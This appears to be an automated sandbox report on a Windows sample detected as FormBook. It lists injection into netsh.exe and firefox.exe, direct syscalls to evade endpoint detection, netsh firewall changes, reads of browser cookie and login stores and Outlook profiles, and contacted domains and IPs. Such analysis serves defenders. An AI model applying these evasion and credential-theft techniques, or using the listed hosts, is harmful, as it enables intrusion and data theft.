Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h] 1_2_01110A5B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h] 1_2_01110A5B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h] 1_2_0117CA72
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h] 1_2_0117CA72
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AEA60 mov eax, dword ptr fs:[00000030h] 1_2_011AEA60
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h] 1_2_0113CA6F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h] 1_2_0113CA6F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h] 1_2_0113CA6F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01138A90 mov edx, dword ptr fs:[00000030h] 1_2_01138A90
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4A80 mov eax, dword ptr fs:[00000030h] 1_2_011D4A80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h] 1_2_01108AA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h] 1_2_01108AA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: yZcecBUXN7.exe, WO-.cs Reference to suspicious API methods: _003B_2964_05B4.MapVirtualKey(_05B5.union.keyboardInput.wVk, 0)
Source: yZcecBUXN7.exe, ---.cs Reference to suspicious API methods: _003B_2964_05B4.GetAsyncKeyState(16)
Source: yZcecBUXN7.exe, ---.cs Reference to suspicious API methods: _003B_2964_05B4.OpenProcess(_FFFDi, _0739_0300, K_07FB_06E8)
Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory written: C:\Users\user\Desktop\yZcecBUXN7.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3020 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\netsh.exe Thread APC queued: target process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe" Jump to behavior
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: yZcecBUXN7.exe Binary or memory string: Progman
Source: yZcecBUXN7.exe Binary or memory string: IsProgmanWindow
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: yZcecBUXN7.exe Binary or memory string: tUser32FocusedMenuhwndMenuhMenuNonClientSysMenuRawTextRange_ScrollIntoViewRawScrollItemPattern_ScrollIntoViewget_CurrentViewRawMultipleViewPattern_SetCurrentViewget_Rowget_WindowIsKnownBadWindowRawUiaEventAddWindowGetFirstOrLastOwnedWindowGetFocusedWindowRawUiaEventRemoveWindowFindModalWindowIsTopLevelWindowIsProgmanWindowIsTransformPatternWindowIsWindowPatternWindowGetDesktopWindowIsWindowSwitchToThisWindowGetWindowGetModuleFileNameExpt_xdxCZGwDCEsywxZZUZfkyhhxget_LabeledBypt_yInitializeArrayToArrayToCharArrayPropertyArrayToIntArrayConvertToElementArraydyIsExtendedKeyMapVirtualKeyVirtualKeyFromKeyget_AcceleratorKeyget_AccessKeyRegisterHotKeyUnregisterHotKeyget_AssemblyGetExecutingAssemblyRegisterClientSideProviderAssemblyGetAssemblyRegisterProxyAssemblyget_IsReadOnlyRaiseEventInThisClientOnlyIndexOfAnyOnEventObjectDestroyCopyget_NonClientMenuBarProxyFactoryget_NonClientProxyFactoryget_User32FocusedMenuProxyFactoryget_NonClientSysMenuProxyFactoryGetProxyFromEntryDictionaryEntryop_Equalityop_InequalityAccessibilitySystem.Securityget_EmptyIsNullOrEmptyget_IsEmptyget_PropertyRuntimeIdPropertyFrameworkIdPropertyAutomationIdPropertyProcessIdPropertyIsEnabledPropertyIsSelectionRequiredPropertyIsSelectedPropertyContainingGridPropertyIsPasswordPropertyLargeChangePropertySmallChangePropertyIsGridPatternAvailablePropertyIsInvokePatternAvailablePropertyIsTablePatternAvailablePropertyIsTogglePatternAvailablePropertyIsExpandCollapsePatternAvailablePropertyIsRangeValuePatternAvailablePropertyIsValuePatternAvailablePropertyIsDockPatternAvailablePropertyIsScrollPatternAvailablePropertyIsGridItemPatternAvailablePropertyIsTableItemPatternAvailablePropertyIsScrollItemPatternAvailablePropertyIsSelectionItemPatternAvailablePropertyIsTransformPatternAvailablePropertyIsSelectionPatternAvailablePropertyIsTextPatternAvailablePropertyIsMultipleViewPatternAvailablePropertyIsWindowPatternAvailablePropertyVerticallyScrollablePropertyHorizontallyScrollablePropertyIsKeyboardFocusablePropertyNativeWindowHandlePropertyBoundingRectanglePropertyCanSelectMultiplePropertyClassNamePropertyLocalizedControlTypePropertyItemTypePropertyCulturePropertyToggleStatePropertyExpandCollapseStatePropertyWindowVisualStatePropertyWindowInteractionStatePropertyCanRotatePropertyValuePropertyCanMovePropertyVerticalViewSizePropertyHorizontalViewSizePropertyCanMinimizePropertyCanMaximizePropertyCanResizePropertyIsModalPropertyIsRequiredForFormPropertyMinimumPropertyMaximumPropertyColumnSpanPropertyRowSpanPropertyIsOffscreenPropertyColumnPropertyAutomationPropertyOrientationPropertySelectionPropertyDockPositionPropertySelectionContainerPropertyRowOrColumnMajorPropertyHasPropertyColumnHeaderItemsPropertyRowHeaderItemsPropertyColumnHeadersPropertyRowHeadersPropertyHasKeyboardFocusPropertyItemStatusPropertySupportedViewsPropertyVerticalScrollPercentPropertyHorizontalScrollPercentPropertyIsControlElementPropertyIsContentElementPropertyClickablePointPropertyColumnCountPropertyRowCountPropertyIsTopmostPropert
Source: yZcecBUXN7.exe Binary or memory string: CommentsWindows Progman Group ConverterL
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Queries volume information: C:\Users\user\Desktop\yZcecBUXN7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435169 Sample: yZcecBUXN7.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 28 www.yamiyasheec.online 2->28 30 www.vavada-band.ru 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 6 other signatures 2->48 10 yZcecBUXN7.exe 3 2->10         started        signatures3 process4 signatures5 60 Injects a PE file into a foreign processes 10->60 13 yZcecBUXN7.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 jBaxmaKIzqHZYEOPQcTTJTXx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netsh.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Deletes itself after installation 19->54 56 3 other signatures 19->56 22 jBaxmaKIzqHZYEOPQcTTJTXx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.quantummquest.top 203.161.50.127, 49754, 49755, 49756 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.whirledairlines.com 216.40.34.41, 49750, 49751, 49752 TUCOWSCA Canada 22->36 38 10 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
203.161.50.127
 www.quantummquest.top Malaysia
45899 VNPT-AS-VNVNPTCorpVN false
195.24.68.5
 www.dhleba51.ru Russian Federation
48287 RU-CENTERRU false
153.92.8.41
 cucuzeus88.store Germany
47583 AS-HOSTINGERLT false
101.99.93.157
 bnbuotqakx.shop Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY false
188.116.38.155
 applesolve.com Poland
43333 NEPHAX-ASPL false
148.251.36.121
 vavada-band.ru Germany
24940 HETZNER-ASDE false
119.18.54.116
 yamiyasheec.online India
394695 PUBLIC-DOMAIN-REGISTRYUS false
108.186.8.158
 www.xxaiai.top United States
54600 PEGTECHINCUS false
192.250.235.36
 dainikmirpur.com United States
